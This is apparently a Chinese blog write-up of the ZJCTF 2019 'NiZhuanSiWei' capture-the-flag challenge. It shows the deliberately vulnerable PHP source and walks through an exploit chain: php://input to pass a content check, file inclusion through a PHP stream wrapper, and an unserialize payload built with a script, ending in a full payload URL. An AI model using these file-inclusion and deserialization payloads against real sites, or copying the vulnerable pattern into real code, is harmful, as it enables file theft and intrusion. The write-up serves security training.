【ZJCTF2019】NiZhuanSiWei

Itachi
  2021-12-29 01:15:42 2021-12-29 01:15:42 创建   2021-12-29 02:56:32 2021-12-29 02:56:32 更新      

[ZJCTF 2019]NiZhuanSiWei

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

$text 中的字符串必须是”welcome to the zjctf”,可以 php://input写入
include($file)想到伪协议,提示 useless.php

抓包读取一下 useless.php
img

useless.php

得到 uesless.php的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

$password应为该类的序列化字符串,其中 $file属性的值应为 flag.php

payload

脚本

1
2
3
4
5
6
7
8
<?php
class Flag {
    public $file = 'flag.php';
}
$a = new Flag;
echo urlencode(serialize($a));

# O%3A4%3A%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D

payload:?file=useless.php&text=php://input&password=O%3A4%3A%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D
在回显页面源码中看到flag
img

  • 标题: 【ZJCTF2019】NiZhuanSiWei
  • 作者: Itachi
  • 创建于 : 2021-12-29 01:15:42
  • 更新于 : 2021-12-29 02:56:32
  • 链接: https://blog.tarchi.top/ctf/【ZJCTF2019】NiZhuanSiWei/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
 评论
此页目录
【ZJCTF2019】NiZhuanSiWei
  1. [ZJCTF 2019]NiZhuanSiWei
    1. 源码
    2. useless.php
    3. payload